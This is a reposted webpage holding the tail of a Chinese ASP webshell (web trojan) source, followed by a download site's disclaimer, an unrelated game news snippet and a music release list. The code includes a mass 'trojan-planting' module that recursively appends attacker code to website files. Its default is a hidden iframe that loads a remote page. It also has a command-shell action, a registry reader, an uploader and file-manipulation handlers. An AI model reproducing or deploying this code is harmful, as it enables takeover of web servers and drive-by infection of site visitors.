If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Server.MapPath("\")
&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()[^""]\)"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font
color=red>不能跟踪检查Server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
Set Matches = Nothing
Set regEx = Nothing
Set XregEx = New RegExp
XregEx.IgnoreCase = True
XregEx.Global = True
XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
Set XMatches = XregEx.Execute(filetxt)
For Each Match in XMatches
tmpLake2 = Mid(Match.Value, 1, InStr
(Match.Value, ">"))
srcSeek = InStr(1, tmpLake2, "src", 1)
If srcSeek > 0 Then
srcSeek2 = instr(srcSeek, tmpLake2,
"=")
For i = 1 To 50
tmp = Mid(tmpLake2, srcSeek2 +
i, 1)
If tmp <> " " and tmp <> chr(9)
and tmp <> vbCrLf Then
Exit For
End If
Next
If tmp = """" Then
tmpName = Mid(tmpLake2,
srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 -
i - 1)
Else
If InStr(srcSeek2 + i + 1,
tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr
(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName =
tmpLake2
If InStr(tmpName, chr(9)) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
If InStr(tmpName, vbCrLf) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
If InStr(tmpName, ">") > 0 Then
tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
End If
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")
&"\","",1,1,1))
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
If Instr(Match.Value, "&") or Instr
(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr
(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
Report =
Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObjec
t函数使用了变形技术"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
exit sub
End If
Next
Set Matches = Nothing
Set regEx = Nothing
end if
set ofile = nothing
set FSO1s = nothing
End Sub
Function CheckExt(FileExt)
If DimFileExt = "*" Then CheckExt = True
Ext = Split(DimFileExt,",")
For i = 0 To Ubound(Ext)
If Lcase(FileExt) = Ext(i) Then
CheckExt = True
Exit Function
End If
Next
End Function
Function GetDateModify(filepath)
Set F2SO = CreateObject("Scripting.FileSystemObject")
Set f = F2SO.GetFile(filepath)
s = f.DateLastModified
set f = nothing
set F2SO = nothing
GetDateModify = s
End Function
Function GetDateCreate(filepath)
Set F3SO = CreateObject("Scripting.FileSystemObject")
Set f = F3SO.GetFile(filepath)
s = f.DateCreated
set f = nothing
set F3SO = nothing
GetDateCreate = s
End Function
Function tURLEncode(Str)
temp = Replace(Str, "%", "%25")
temp = Replace(temp, "#", "%23")
temp = Replace(temp, "&", "%26")
tURLEncode = temp
End Function
Sub ShowAllFile2(Path)
Set F4SO = CreateObject("Scripting.FileSystemObject")
if not F4SO.FolderExists(path) then exit sub
Set f = F4SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F4SO.GetExtensionName
(path&"\"&myfile.name)) Then
Call IsFind(Path&"\"&myfile.name)
SumFiles = SumFiles + 1
End If
Next
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile2 path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F4SO = Nothing
End Sub
Sub IsFind(thePath)
theDate = GetDateModify(thePath)
on error resume next
theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
if err then exit Sub
xDate = Split(request.Form("Search_Date"),";")
If request.Form("Search_Date") = "ALL" Then ALLTime = True
For i = 0 To Ubound(xDate)
If theTmp = xDate(i) or ALLTime = True Then
If request("Search_Content") <> "" Then
Set FSO2s = CreateObject
("Scripting.FileSystemObject")
set ofile = FSO2s.OpenTextFile(thePath,
1, false, -2)
filetxt = Lcase(ofile.readall())
If Instr( filetxt, LCase(request.Form
("Search_Content"))) > 0 Then
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Report =
Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
ofile.close()
Set ofile = Nothing
Set FSO2s = Nothing
Else
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
End If
Next
End Sub
Case "plgm"
Server.ScriptTimeout=1000000
Response.Buffer=False
RRS ("<b>当前网站绝对路径:")&Server.MapPath("/")&("</b>")
ASP_SELF=Request.ServerVariables("PATH_INFO")
s=Request("fd")
if s="" then s=Server.MapPath("/")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")
addcode = Request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
If ex<>"" AND pth<>"" Then
select Case ex
Case "edit"
CALL file_show(pth)
Case "save"
CALL file_save(pth)
End select
Else
RRS("<form method=""POST""> ")
RRS("<table width=560 border=""0"" style=""font-size:12px;"">")
RRS("<tr>")
RRS("<td width=""102"">要挂马文件夹的绝对路径:</td>")
RRS("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
RRS("<td width=""69""> </td>")
RRS("</tr><tr><td>要挂马的代码:</td>")
RRS("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
RRS("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
RRS("</tr></table></form> ")
End If
Function IsPattern(patt,str)
Set regEx=New RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
Set regEx=Nothing
If retVal=True Then
IsPattern=True
Else
IsPattern=False
End If
End Function
if request.form("submit")<>"" then
If s="" or addcode="" Then
RRS "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then sch s
End If
end if
Sub sch(s)
oN eRrOr rEsUmE nExT
Set fs=Server.createObject("Scripting.FileSystemObject")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.path
step_all rtn
Next
If sf.Count<>0 Then
For Each l In sf
sch l
Next
End If
End Sub
Sub step_all(agr)
retVal=IsPattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
Sub step1(str1)
RRS "<div style='line-height:20px'>√ "&str1&" _"
RRs "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DownFile"")' class='am' title='下载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a></div>"
End Sub
Sub step2(str2)
Set fs=Server.createObject("Scripting.FileSystemObject")
isExist=fs.FileExists(str2)
If isExist Then
Set f=fs.GetFile(str2)
Set f_addcode=f.OpenAsTextStream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.Write
else
f_addcode.Write addcode
f_addcode.Close
Set f=Nothing
End If
end if
Set fs=Nothing
End Sub
Err.Clear
Case "Cplgm"
Fpath=Request("fd")
addcode = Request("code")
addcode2 = Request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
ShowMsg=request("ShowMsg")
FType=request("FType")
M=request("M")
if Ftype="" then
Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if Fpath="\" then Fpath=Server.MapPath("\")
if Fpath="." or Fpath="" then Fpath=Server.MapPath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
if pcfile="" then
pcfileName=Request.ServerVariables("SCRIPT_NAME")
pcfilek=split(pcfileName,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form method=POST><div style='color:#3399ff'><b>["
if M="1" then RRS"批量挂马器-批量挂马"
if M="2" then RRS"批量清马器-清除别人的网马"
if M="3" then RRS"批量替换器-文件替换修改工具"
if M="" then response.end
RRS "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
RRS "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if M="1" then RRS "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
RRS "<tr><td>排除文件:</td>"
RRS "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
RRS "<tr><td>文件类型:</td>"
RRS "<td><input name='FType' type=text id='FType'
value='"&Ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if M="1" then RRS"要挂的马:"
if M="2" then RRS"要清的马:"
if M="3" then RRS"查找内容:"
RRS"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
if M="3" then RRS "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
RRS "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
RRS "</table></form>"
if request("submit")="开始执行" then
RRS"<div style='line-height:25px'><b>执行记录:</b><br>"
call InsertAllFiles(Fpath,addcode,pcfile)
RRS"</div>"
end if
Sub InsertAllFiles(Wpath,Wcode,pc)
Server.ScriptTimeout=999999999
if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
Set WFSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = WFSO.GetFolder(Wpath)
Set fc2 = f.files
For Each myfile in fc2
Set FS1 = CreateObject("Scripting.FileSystemObject")
FType1=split(myfile.name,".")
FType2=ubound(FType1)
if Ftype2>0 then
FType3=LCase(FType1(FType2))
else
FType3="无"
end if
if Instr(LCase(pc),LCase(myfile.name))=0 and Instr
(LCase(FType),FType3)<>0 then
select case M
case "1"
if checkbox<>"checked" then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.Write
RRS"√
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
Set
tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
if Instr
(tfile1.readall,Wcode)=0 then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.Write
RRS"×
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile1.close
end if
else
RRS"<font
color=red>×</font> "&Wpath&myfile.name
tfile1.close
end if
Set tfile1=Nothing
end if
case "2"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,"")
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
case "3"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,addCode2)
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
case else
RRS"大哥,别乱来.":response.end
end select
else
RRS"× "&Wpath&myfile.name
end if
RRS " → <a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='下
载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='编
辑'>编辑</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='复
制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='移
动'>移动</a><br>"
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
NewPath=Wpath&""&f1.name
InsertAllFiles NewPath,Wcode,pc
Next
set tfile=nothing
Set FSO = Nothing
set tfile=nothing
set tfile2=nothing
Set WFSO = Nothing
End Sub
Case "ReadREG":call ReadREG()
Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session
("FolderPath")):Set ABC=Nothing
Case "DownFile":DownFile FName:ShowErr()
Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set
ABC=Nothing
Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set
ABC=Nothing
Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
Case "UpFile":UpFile()
Case "Cmd1Shell":Cmd1Shell()
Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect
URL
Case "DbManager":DbManager()
Case "Course":Course()
Case "ServerInfo":ServerInfo()
Case Else MainForm()
End Select
if Action<>"Servu" then ShowErr()
RRS"</body></html>"
%>
打包文件下载
标签:
一款不错的asp木马,黑色界面
圆月山庄资源网 Design By www.vgjia.com
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
圆月山庄资源网 Design By www.vgjia.com
暂无评论...
稳了!魔兽国服回归的3条重磅消息!官宣时间再确认!
昨天有一位朋友在大神群里分享,自己亚服账号被封号之后居然弹出了国服的封号信息对话框。
这里面让他访问的是一个国服的战网网址,com.cn和后面的zh都非常明白地表明这就是国服战网。
而他在复制这个网址并且进行登录之后,确实是网易的网址,也就是我们熟悉的停服之后国服发布的暴雪游戏产品运营到期开放退款的说明。这是一件比较奇怪的事情,因为以前都没有出现这样的情况,现在突然提示跳转到国服战网的网址,是不是说明了简体中文客户端已经开始进行更新了呢?
更新日志
2024年12月24日
2024年12月24日
- 小骆驼-《草原狼2(蓝光CD)》[原抓WAV+CUE]
- 群星《欢迎来到我身边 电影原声专辑》[320K/MP3][105.02MB]
- 群星《欢迎来到我身边 电影原声专辑》[FLAC/分轨][480.9MB]
- 雷婷《梦里蓝天HQⅡ》 2023头版限量编号低速原抓[WAV+CUE][463M]
- 群星《2024好听新歌42》AI调整音效【WAV分轨】
- 王思雨-《思念陪着鸿雁飞》WAV
- 王思雨《喜马拉雅HQ》头版限量编号[WAV+CUE]
- 李健《无时无刻》[WAV+CUE][590M]
- 陈奕迅《酝酿》[WAV分轨][502M]
- 卓依婷《化蝶》2CD[WAV+CUE][1.1G]
- 群星《吉他王(黑胶CD)》[WAV+CUE]
- 齐秦《穿乐(穿越)》[WAV+CUE]
- 发烧珍品《数位CD音响测试-动向效果(九)》【WAV+CUE】
- 邝美云《邝美云精装歌集》[DSF][1.6G]
- 吕方《爱一回伤一回》[WAV+CUE][454M]